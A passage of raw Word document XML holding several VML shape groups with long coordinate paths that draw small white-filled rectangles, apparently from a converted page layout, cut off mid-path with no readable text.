3896,2360,3896,2359,3896,2358,3896,2356,3896,2355,3896,2354,3896,2352,3896,2351,3896,2349,3896,2347,3896,2346,3896,2344,3896,2342,3896,2341,3896,2339,3896,2337,3896,2335,3896,2333,3896,2330,3896,2328,3896,2326,3896,2324,3896,2321,3896,2319,3896,2316,3896,2314,3896,2311,3896,2308,3896,2306,3896,2303,3896,2300,3896,2297,3896,2294,3896,2290,3896,2287,3896,2284,3896,2281,3896,2277,3896,2273,3896,2270,3896,2266,3896,2262,3896,2258,3896,2254,3896,2250,3896,2246,3896,2242,3896,2238,3896,2233,3896,2229,3896,2224,3896,2220,3896,2215,3896,2210,3896,2205,3896,2200,3896,2195,3896,2189,3896,2184,3896,2179,3896,2173,3896,2167,3896,2162,3896,2156,3896,2150,3896,2144,3896,2138,3896,2131,3896,2125e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:253.500pt;margin-top:105.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5070,2110" coordsize="130,270">
        <v:shape style="position:absolute;left:5070;top:2110;width:130;height:270" coordorigin="5070,2110" coordsize="130,270" path="m5097,2125l5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5097,2125,5098,2125,5098,2125,5098,2125,5098,2125,5098,2125,5098,2125,5098,2125,5099,2125,5099,2125,5099,2125,5099,2125,5100,2125,5100,2125,5100,2125,5100,2125,5101,2125,5101,2125,5101,2125,5102,2125,5102,2125,5103,2125,5103,2125,5104,2125,5104,2125,5104,2125,5105,2125,5105,2125,5106,2125,5107,2125,5107,2125,5108,2125,5108,2125,5109,2125,5110,2125,5110,2125,5111,2125,5112,2125,5113,2125,5114,2125,5114,2125,5115,2125,5116,2125,5117,2125,5118,2125,5119,2125,5120,2125,5121,2125,5122,2125,5123,2125,5124,2125,5125,2125,5127,2125,5128,2125,5129,2125,5130,2125,5132,2125,5133,2125,5134,2125,5136,2125,5137,2125,5139,2125,5140,2125,5142,2125,5143,2125,5145,2125,5147,2125,5149,2125,5150,2125,5152,2125,5154,2125,5156,2125,5158,2125,5160,2125,5162,2125,5164,2125,5166,2125,5168,2125,5170,2125,5172,2125,5174,2125,5177,2125,5179,2125,5181,2125,5184,2125,5186,2125,5189,2125,5191,2125,5194,2125,5197,2125,5199,2125,5202,2125,5205,2125,5208,2125,5211,2125,5214,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2125,5217,2126,5217,2126,5217,2126,5217,2126,5217,2126,5217,2126,5217,2126,5217,2127,5217,2127,5217,2127,5217,2127,5217,2128,5217,2128,5217,2128,5217,2129,5217,2129,5217,2130,5217,2130,5217,2131,5217,2131,5217,2132,5217,2132,5217,2133,5217,2133,5217,2134,5217,2135,5217,2136,5217,2136,5217,2137,5217,2138,5217,2139,5217,2140,5217,2141,5217,2142,5217,2143,5217,2144,5217,2145,5217,2146,5217,2148,5217,2149,5217,2150,5217,2152,5217,2153,5217,2155,5217,2156,5217,2158,5217,2159,5217,2161,5217,2163,5217,2165,5217,2167,5217,2169,5217,2171,5217,2173,5217,2175,5217,2177,5217,2179,5217,2182,5217,2184,5217,2186,5217,2189,5217,2192,5217,2194,5217,2197,5217,2200,5217,2203,5217,2206,5217,2209,5217,2212,5217,2215,5217,2218,5217,2221,5217,2225,5217,2228,5217,2232,5217,2235,5217,2239,5217,2243,5217,2247,5217,2251,5217,2255,5217,2259,5217,2263,5217,2268,5217,2272,5217,2276,5217,2281,5217,2286,5217,2291,5217,2295,5217,2300,5217,2305,5217,2311,5217,2316,5217,2321,5217,2327,5217,2332,5217,2338,5217,2344,5217,2349,5217,2355,5217,2361,5217,2368,5217,2374,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5217,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5216,2380,5215,2380,5215,2380,5215,2380,5215,2380,5215,2380,5215,2380,5214,2380,5214,2380,5214,2380,5214,2380,5213,2380,5213,2380,5213,2380,5212,2380,5212,2380,5212,2380,5211,2380,5211,2380,5211,2380,5210,2380,5210,2380,5209,2380,5209,2380,5208,2380,5208,2380,5207,2380,5207,2380,5206,2380,5205,2380,5205,2380,5204,2380,5203,2380,5203,2380,5202,2380,5201,2380,5200,2380,5200,2380,5199,2380,5198,2380,5197,2380,5196,2380,5195,2380,5194,2380,5193,2380,5192,2380,5191,2380,5190,2380,5189,2380,5188,2380,5187,2380,5185,2380,5184,2380,5183,2380,5182,2380,5180,2380,5179,2380,5177,2380,5176,2380,5174,2380,5173,2380,5171,2380,5170,2380,5168,2380,5166,2380,5165,2380,5163,2380,5161,2380,5159,2380,5157,2380,5156,2380,5154,2380,5152,2380,5150,2380,5147,2380,5145,2380,5143,2380,5141,2380,5139,2380,5136,2380,5134,2380,5132,2380,5129,2380,5127,2380,5124,2380,5122,2380,5119,2380,5117,2380,5114,2380,5111,2380,5108,2380,5105,2380,5103,2380,5100,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2380,5097,2379,5097,2379,5097,2379,5097,2379,5097,2379,5097,2379,5097,2378,5097,2378,5097,2378,5097,2378,5097,2377,5097,2377,5097,2377,5097,2376,5097,2376,5097,2375,5097,2375,5097,2374,5097,2374,5097,2373,5097,2373,5097,2372,5097,2371,5097,2371,5097,2370,5097,2369,5097,2368,5097,2367,5097,2366,5097,2365,5097,2364,5097,2363,5097,2362,5097,2361,5097,2360,5097,2359,5097,2358,5097,2356,5097,2355,5097,2354,5097,2352,5097,2351,5097,2349,5097,2347,5097,2346,5097,2344,5097,2342,5097,2341,5097,2339,5097,2337,5097,2335,5097,2333,5097,2330,5097,2328,5097,2326,5097,2324,5097,2321,5097,2319,5097,2316,5097,2314,5097,2311,5097,2308,5097,2306,5097,2303,5097,2300,5097,2297,5097,2294,5097,2290,5097,2287,5097,2284,5097,2281,5097,2277,5097,2273,5097,2270,5097,2266,5097,2262,5097,2258,5097,2254,5097,2250,5097,2246,5097,2242,5097,2238,5097,2233,5097,2229,5097,2224,5097,2220,5097,2215,5097,2210,5097,2205,5097,2200,5097,2195,5097,2189,5097,2184,5097,2179,5097,2173,5097,2167,5097,2162,5097,2156,5097,2150,5097,2144,5097,2138,5097,2131,5097,2125e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:123.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,2470" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:2470;width:130;height:270" coordorigin="1950,2470" coordsize="130,270" path="m1975,2485l1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1975,2485,1976,2485,1976,2485,1976,2485,1976,2485,1976,2485,1976,2485,1976,2485,1976,2485,1977,2485,1977,2485,1977,2485,1977,2485,1977,2485,1978,2485,1978,2485,1978,2485,1978,2485,1979,2485,1979,2485,1979,2485,1980,2485,1980,2485,1980,2485,1981,2485,1981,2485,1981,2485,1982,2485,1982,2485,1983,2485,1983,2485,1984,2485,1984,2485,1985,2485,1986,2485,1986,2485,1987,2485,1988,2485,1988,2485,1989,2485,1990,2485,1990,2485,1991,2485,1992,2485,1993,2485,1994,2485,1995,2485,1995,2485,1996,2485,1997,2485,1998,2485,1999,2485,2000,2485,2002,2485,2003,2485,2004,2485,2005,2485,2006,2485,2008,2485,2009,2485,2010,2485,2011,2485,2013,2485,2014,2485,2016,2485,2017,2485,2019,2485,2020,2485,2022,2485,2024,2485,2025,2485,2027,2485,2029,2485,2030,2485,2032,2485,2034,2485,2036,2485,2038,2485,2040,2485,2042,2485,2044,2485,2046,2485,2048,2485,2051,2485,2053,2485,2055,2485,2057,2485,2060,2485,2062,2485,2065,2485,2067,2485,2070,2485,2072,2485,2075,2485,2078,2485,2081,2485,2083,2485,2086,2485,2089,2485,2092,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2486,2095,2486,2095,2486,2095,2486,2095,2486,2095,2486,2095,2486,2095,2486,2095,2486,2095,2487,2095,2487,2095,2487,2095,2487,2095,2488,2095,2488,2095,2488,2095,2489,2095,2489,2095,2489,2095,2490,2095,2490,2095,2491,2095,2491,2095,2492,2095,2492,2095,2493,2095,2494,2095,2494,2095,2495,2095,2496,2095,2496,2095,2497,2095,2498,2095,2499,2095,2500,2095,2501,2095,2502,2095,2503,2095,2504,2095,2505,2095,2507,2095,2508,2095,2509,2095,2510,2095,2512,2095,2513,2095,2515,2095,2516,2095,2518,2095,2520,2095,2521,2095,2523,2095,2525,2095,2527,2095,2529,2095,2531,2095,2533,2095,2535,2095,2537,2095,2539,2095,2542,2095,2544,2095,2547,2095,2549,2095,2552,2095,2554,2095,2557,2095,2560,2095,2563,2095,2566,2095,2569,2095,2572,2095,2575,2095,2578,2095,2582,2095,2585,2095,2588,2095,2592,2095,2596,2095,2599,2095,2603,2095,2607,2095,2611,2095,2615,2095,2619,2095,2623,2095,2628,2095,2632,2095,2637,2095,2641,2095,2646,2095,2651,2095,2656,2095,2661,2095,2666,2095,2671,2095,2676,2095,2681,2095,2687,2095,2692,2095,2698,2095,2704,2095,2710,2095,2716,2095,2722,2095,2728,2095,2734,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2094,2740,2094,2740,2094,2740,2094,2740,2094,2740,2094,2740,2094,2740,2094,2740,2093,2740,2093,2740,2093,2740,2093,2740,2093,2740,2092,2740,2092,2740,2092,2740,2092,2740,2091,2740,2091,2740,2091,2740,2090,2740,2090,2740,2090,2740,2089,2740,2089,2740,2089,2740,2088,2740,2088,2740,2087,2740,2087,2740,2086,2740,2086,2740,2085,2740,2084,2740,2084,2740,2083,2740,2083,2740,2082,2740,2081,2740,2080,2740,2080,2740,2079,2740,2078,2740,2077,2740,2076,2740,2075,2740,2075,2740,2074,2740,2073,2740,2072,2740,2071,2740,2070,2740,2068,2740,2067,2740,2066,2740,2065,2740,2064,2740,2063,2740,2061,2740,2060,2740,2059,2740,2057,2740,2056,2740,2054,2740,2053,2740,2051,2740,2050,2740,2048,2740,2047,2740,2045,2740,2043,2740,2041,2740,2040,2740,2038,2740,2036,2740,2034,2740,2032,2740,2030,2740,2028,2740,2026,2740,2024,2740,2022,2740,2019,2740,2017,2740,2015,2740,2013,2740,2010,2740,2008,2740,2005,2740,2003,2740,2000,2740,1998,2740,1995,2740,1992,2740,1990,2740,1987,2740,1984,2740,1981,2740,1978,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2740,1975,2739,1975,2739,1975,2739,1975,2739,1975,2739,1975,2739,1975,2738,1975,2738,1975,2738,1975,2737,1975,2737,1975,2737,1975,2736,1975,2736,1975,2735,1975,2735,1975,2734,1975,2734,1975,2733,1975,2733,1975,2732,1975,2731,1975,2731,1975,2730,1975,2729,1975,2728,1975,2727,1975,2727,1975,2726,1975,2725,1975,2724,1975,2723,1975,2721,1975,2720,1975,2719,1975,2718,1975,2717,1975,2715,1975,2714,1975,2712,1975,2711,1975,2709,1975,2708,1975,2706,1975,2704,1975,2703,1975,2701,1975,2699,1975,2697,1975,2695,1975,2693,1975,2691,1975,2688,1975,2686,1975,2684,1975,2681,1975,2679,1975,2677,1975,2674,1975,2671,1975,2669,1975,2666,1975,2663,1975,2660,1975,2657,1975,2654,1975,2651,1975,2647,1975,2644,1975,2641,1975,2637,1975,2634,1975,2630,1975,2626,1975,2622,1975,2619,1975,2615,1975,2611,1975,2606,1975,2602,1975,2598,1975,2593,1975,2589,1975,2584,1975,2580,1975,2575,1975,2570,1975,2565,1975,2560,1975,2555,1975,2550,1975,2544,1975,2539,1975,2533,1975,2528,1975,2522,1975,2516,1975,2510,1975,2504,1975,2498,1975,2492,1975,2485e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:123.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,2470" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:2470;width:130;height:270" coordorigin="2070,2470" coordsize="130,270" path="m2095,2485l2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2095,2485,2096,2485,2096,2485,2096,2485,2096,2485,2096,2485,2096,2485,2096,2485,2096,2485,2096,2485,2097,2485,2097,2485,2097,2485,2097,2485,2097,2485,2098,2485,2098,2485,2098,2485,2098,2485,2099,2485,2099,2485,2099,2485,2100,2485,2100,2485,2100,2485,2101,2485,2101,2485,2102,2485,2102,2485,2102,2485,2103,2485,2103,2485,2104,2485,2105,2485,2105,2485,2106,2485,2106,2485,2107,2485,2108,2485,2108,2485,2109,2485,2110,2485,2110,2485,2111,2485,2112,2485,2113,2485,2114,2485,2115,2485,2116,2485,2116,2485,2117,2485,2118,2485,2119,2485,2121,2485,2122,2485,2123,2485,2124,2485,2125,2485,2126,2485,2128,2485,2129,2485,2130,2485,2132,2485,2133,2485,2134,2485,2136,2485,2137,2485,2139,2485,2140,2485,2142,2485,2144,2485,2145,2485,2147,2485,2149,2485,2151,2485,2152,2485,2154,2485,2156,2485,2158,2485,2160,2485,2162,2485,2164,2485,2166,2485,2168,2485,2171,2485,2173,2485,2175,2485,2178,2485,2180,2485,2182,2485,2185,2485,2187,2485,2190,2485,2192,2485,2195,2485,2198,2485,2201,2485,2203,2485,2206,2485,2209,2485,2212,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2485,2215,2486,2215,2486,2215,2486,2215,2486,2215,2486,2215,2486,2215,2486,2215,2486,2215,2486,2215,2487,2215,2487,2215,2487,2215,2487,2215,2488,2215,2488,2215,2488,2215,2489,2215,2489,2215,2489,2215,2490,2215,2490,2215,2491,2215,2491,2215,2492,2215,2492,2215,2493,2215,2494,2215,2494,2215,2495,2215,2496,2215,2496,2215,2497,2215,2498,2215,2499,2215,2500,2215,2501,2215,2502,2215,2503,2215,2504,2215,2505,2215,2507,2215,2508,2215,2509,2215,2510,2215,2512,2215,2513,2215,2515,2215,2516,2215,2518,2215,2520,2215,2521,2215,2523,2215,2525,2215,2527,2215,2529,2215,2531,2215,2533,2215,2535,2215,2537,2215,2539,2215,2542,2215,2544,2215,2547,2215,2549,2215,2552,2215,2554,2215,2557,2215,2560,2215,2563,2215,2566,2215,2569,2215,2572,2215,2575,2215,2578,2215,2582,2215,2585,2215,2588,2215,2592,2215,2596,2215,2599,2215,2603,2215,2607,2215,2611,2215,2615,2215,2619,2215,2623,2215,2628,2215,2632,2215,2637,2215,2641,2215,2646,2215,2651,2215,2656,2215,2661,2215,2666,2215,2671,2215,2676,2215,2681,2215,2687,2215,2692,2215,2698,2215,2704,2215,2710,2215,2716,2215,2722,2215,2728,2215,2734,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2215,2740,2214,2740,2214,2740,2214,2740,2214,2740,2214,2740,2214,2740,2214,2740,2214,2740,2213,2740,2213,2740,2213,2740,2213,2740,2213,2740,2212,2740,2212,2740,2212,2740,2212,2740,2211,2740,2211,2740,2211,2740,2210,2740,2210,2740,2209,2740,2209,2740,2209,2740,2208,2740,2208,2740,2207,2740,2207,2740,2206,2740,2206,2740,2205,2740,2205,2740,2204,2740,2203,2740,2203,2740,2202,2740,2201,2740,2200,2740,2200,2740,2199,2740,2198,2740,2197,2740,2196,2740,2196,2740,2195,2740,2194,2740,2193,2740,2192,2740,2191,2740,2190,2740,2189,2740,2187,2740,2186,2740,2185,2740,2184,2740,2183,2740,2181,2740,2180,2740,2179,2740,2177,2740,2176,2740,2174,2740,2173,2740,2171,2740,2170,2740,2168,2740,2167,2740,2165,2740,2163,2740,2161,2740,2160,2740,2158,2740,2156,2740,2154,2740,2152,2740,2150,2740,2148,2740,2146,2740,2144,2740,2142,2740,2140,2740,2137,2740,2135,2740,2133,2740,2130,2740,2128,2740,2125,2740,2123,2740,2120,2740,2118,2740,2115,2740,2112,2740,2110,2740,2107,2740,2104,2740,2101,2740,2098,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2740,2095,2739,2095,2739,2095,2739,2095,2739,2095,2739,2095,2739,2095,2738,2095,2738,2095,2738,2095,2737,2095,2737,2095,2737,2095,2736,2095,2736,2095,2735,2095,2735,2095,2734,2095,2734,2095,2733,2095,2733,2095,2732,2095,2731,2095,2731,2095,2730,2095,2729,2095,2728,2095,2727,2095,2727,2095,2726,2095,2725,2095,2724,2095,2723,2095,2721,2095,2720,2095,2719,2095,2718,2095,2717,2095,2715,2095,2714,2095,2712,2095,2711,2095,2709,2095,2708,2095,2706,2095,2704,2095,2703,2095,2701,2095,2699,2095,2697,2095,2695,2095,2693,2095,2691,2095,2688,2095,2686,2095,2684,2095,2681,2095,2679,2095,2677,2095,2674,2095,2671,2095,2669,2095,2666,2095,2663,2095,2660,2095,2657,2095,2654,2095,2651,2095,2647,2095,2644,2095,2641,2095,2637,2095,2634,2095,2630,2095,2626,2095,2622,2095,2619,2095,2615,2095,2611,2095,2606,2095,2602,2095,2598,2095,2593,2095,2589,2095,2584,2095,2580,2095,2575,2095,2570,2095,2565,2095,2560,2095,2555,2095,2550,2095,2544,2095,2539,2095,2533,2095,2528,2095,2522,2095,2516,2095,2510,2095,2504,2095,2498,2095,2492,2095,2485e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:215.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,4310" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:4310;width:130;height:270" coordorigin="3130,4310" coordsize="130,270" path="m3146,4331l3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3146,4331,3147,4331,3147,4331,3147,4331,3147,4331,3147,4331,3147,4331,3148,4331,3148,4331,3148,4331,3148,4331,3148,4331,3149,4331,3149,4331,3149,4331,3149,4331,3150,4331,3150,4331,3150,4331,3151,4331,3151,4331,3152,4331,3152,4331,3153,4331,3153,4331,3153,4331,3154,4331,3154,4331,3155,4331,3156,4331,3156,4331,3157,4331,3157,4331,3158,4331,3159,4331,3159,4331,3160,4331,3161,4331,3162,4331,3163,4331,3163,4331,3164,4331,3165,4331,3166,4331,3167,4331,3168,4331,3169,4331,3170,4331,3171,4331,3172,4331,3173,4331,3174,4331,3176,4331,3177,4331,3178,4331,3179,4331,3181,4331,3182,4331,3183,4331,3185,4331,3186,4331,3188,4331,3189,4331,3191,4331,3192,4331,3194,4331,3196,4331,3198,4331,3199,4331,3201,4331,3203,4331,3205,4331,3207,4331,3209,4331,3211,4331,3213,4331,3215,4331,3217,4331,3219,4331,3221,4331,3223,4331,3226,4331,3228,4331,3230,4331,3233,4331,3235,4331,3238,4331,3240,4331,3243,4331,3246,4331,3248,4331,3251,4331,3254,4331,3257,4331,3260,4331,3263,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4331,3266,4332,3266,4332,3266,4332,3266,4332,3266,4332,3266,4332,3266,4332,3266,4332,3266,4333,3266,4333,3266,4333,3266,4333,3266,4334,3266,4334,3266,4334,3266,4335,3266,4335,3266,4335,3266,4336,3266,4336,3266,4337,3266,4337,3266,4338,3266,4338,3266,4339,3266,4339,3266,4340,3266,4341,3266,4342,3266,4342,3266,4343,3266,4344,3266,4345,3266,4346,3266,4347,3266,4348,3266,4349,3266,4350,3266,4351,3266,4352,3266,4354,3266,4355,3266,4356,3266,4358,3266,4359,3266,4361,3266,4362,3266,4364,3266,4366,3266,4367,3266,4369,3266,4371,3266,4373,3266,4375,3266,4377,3266,4379,3266,4381,3266,4383,3266,4385,3266,4388,3266,4390,3266,4393,3266,4395,3266,4398,3266,4400,3266,4403,3266,4406,3266,4409,3266,4412,3266,4415,3266,4418,3266,4421,3266,4424,3266,4427,3266,4431,3266,4434,3266,4438,3266,4442,3266,4445,3266,4449,3266,4453,3266,4457,3266,4461,3266,4465,3266,4469,3266,4474,3266,4478,3266,4483,3266,4487,3266,4492,3266,4497,3266,4501,3266,4506,3266,4511,3266,4517,3266,4522,3266,4527,3266,4533,3266,4538,3266,4544,3266,4550,3266,4555,3266,4561,3266,4567,3266,4574,3266,4580,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3266,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3265,4586,3264,4586,3264,4586,3264,4586,3264,4586,3264,4586,3264,4586,3263,4586,3263,4586,3263,4586,3263,4586,3262,4586,3262,4586,3262,4586,3261,4586,3261,4586,3261,4586,3260,4586,3260,4586,3260,4586,3259,4586,3259,4586,3258,4586,3258,4586,3257,4586,3257,4586,3256,4586,3256,4586,3255,4586,3254,4586,3254,4586,3253,4586,3252,4586,3252,4586,3251,4586,3250,4586,3249,4586,3249,4586,3248,4586,3247,4586,3246,4586,3245,4586,3244,4586,3243,4586,3242,4586,3241,4586,3240,4586,3239,4586,3238,4586,3237,4586,3236,4586,3234,4586,3233,4586,3232,4586,3231,4586,3229,4586,3228,4586,3226,4586,3225,4586,3223,4586,3222,4586,3220,4586,3219,4586,3217,4586,3215,4586,3214,4586,3212,4586,3210,4586,3208,4586,3206,4586,3205,4586,3203,4586,3201,4586,3199,4586,3197,4586,3194,4586,3192,4586,3190,4586,3188,4586,3186,4586,3183,4586,3181,4586,3178,4586,3176,4586,3173,4586,3171,4586,3168,4586,3166,4586,3163,4586,3160,4586,3157,4586,3154,4586,3152,4586,3149,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4586,3146,4585,3146,4585,3146,4585,3146,4585,3146,4585,3146,4584,3146,4584,3146,4584,3146,4584,3146,4583,3146,4583,3146,4583,3146,4582,3146,4582,3146,4581,3146,4581,3146,4580,3146,4580,3146,4579,3146,4579,3146,4578,3146,4577,3146,4577,3146,4576,3146,4575,3146,4574,3146,4573,3146,4573,3146,4572,3146,4571,3146,4570,3146,4568,3146,4567,3146,4566,3146,4565,3146,4564,3146,4562,3146,4561,3146,4560,3146,4558,3146,4557,3146,4555,3146,4554,3146,4552,3146,4550,3146,4548,3146,4547,3146,4545,3146,4543,3146,4541,3146,4539,3146,4537,3146,4534,3146,4532,3146,4530,3146,4527,3146,4525,3146,4522,3146,4520,3146,4517,3146,4514,3146,4512,3146,4509,3146,4506,3146,4503,3146,4500,3146,4497,3146,4493,3146,4490,3146,4487,3146,4483,3146,4480,3146,4476,3146,4472,3146,4468,3146,4465,3146,4461,3146,4457,3146,4452,3146,4448,3146,4444,3146,4439,3146,4435,3146,4430,3146,4426,3146,4421,3146,4416,3146,4411,3146,4406,3146,4401,3146,4396,3146,4390,3146,4385,3146,4379,3146,4374,3146,4368,3146,4362,3146,4356,3146,4350,3146,4344,3146,4338,3146,4331e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:233.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,4670" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:4670;width:130;height:270" coordorigin="3490,4670" coordsize="130,270" path="m3506,4691l3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3506,4691,3507,4691,3507,4691,3507,4691,3507,4691,3507,4691,3507,4691,3507,4691,3508,4691,3508,4691,3508,4691,3508,4691,3508,4691,3509,4691,3509,4691,3509,4691,3509,4691,3510,4691,3510,4691,3510,4691,3511,4691,3511,4691,3511,4691,3512,4691,3512,4691,3513,4691,3513,4691,3514,4691,3514,4691,3515,4691,3515,4691,3516,4691,3516,4691,3517,4691,3518,4691,3518,4691,3519,4691,3520,4691,3520,4691,3521,4691,3522,4691,3523,4691,3524,4691,3524,4691,3525,4691,3526,4691,3527,4691,3528,4691,3529,4691,3530,4691,3531,4691,3532,4691,3533,4691,3535,4691,3536,4691,3537,4691,3538,4691,3540,4691,3541,4691,3542,4691,3544,4691,3545,4691,3547,4691,3548,4691,3550,4691,3551,4691,3553,4691,3554,4691,3556,4691,3558,4691,3559,4691,3561,4691,3563,4691,3565,4691,3567,4691,3569,4691,3571,4691,3573,4691,3575,4691,3577,4691,3579,4691,3581,4691,3584,4691,3586,4691,3588,4691,3591,4691,3593,4691,3596,4691,3598,4691,3601,4691,3603,4691,3606,4691,3609,4691,3611,4691,3614,4691,3617,4691,3620,4691,3623,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4691,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4692,3626,4693,3626,4693,3626,4693,3626,4693,3626,4693,3626,4694,3626,4694,3626,4694,3626,4695,3626,4695,3626,4695,3626,4696,3626,4696,3626,4697,3626,4697,3626,4698,3626,4698,3626,4699,3626,4700,3626,4700,3626,4701,3626,4702,3626,4703,3626,4703,3626,4704,3626,4705,3626,4706,3626,4707,3626,4708,3626,4709,3626,4710,3626,4711,3626,4713,3626,4714,3626,4715,3626,4717,3626,4718,3626,4719,3626,4721,3626,4722,3626,4724,3626,4726,3626,4727,3626,4729,3626,4731,3626,4733,3626,4735,3626,4737,3626,4739,3626,4741,3626,4743,3626,4746,3626,4748,3626,4750,3626,4753,3626,4755,3626,4758,3626,4760,3626,4763,3626,4766,3626,4769,3626,4772,3626,4775,3626,4778,3626,4781,3626,4784,3626,4788,3626,4791,3626,4795,3626,4798,3626,4802,3626,4805,3626,4809,3626,4813,3626,4817,3626,4821,3626,4825,3626,4830,3626,4834,3626,4838,3626,4843,3626,4847,3626,4852,3626,4857,3626,4862,3626,4867,3626,4872,3626,4877,3626,4882,3626,4887,3626,4893,3626,4898,3626,4904,3626,4910,3626,4916,3626,4922,3626,4928,3626,4934,3626,4940,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3626,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3625,4946,3624,4946,3624,4946,3624,4946,3624,4946,3624,4946,3623,4946,3623,4946,3623,4946,3623,4946,3623,4946,3622,4946,3622,4946,3622,4946,3621,4946,3621,4946,3621,4946,3620,4946,3620,4946,3619,4946,3619,4946,3618,4946,3618,4946,3617,4946,3617,4946,3616,4946,3616,4946,3615,4946,3615,4946,3614,4946,3613,4946,3613,4946,3612,4946,3611,4946,3610,4946,3610,4946,3609,4946,3608,4946,3607,4946,3606,4946,3605,4946,3604,4946,3603,4946,3602,4946,3601,4946,3600,4946,3599,49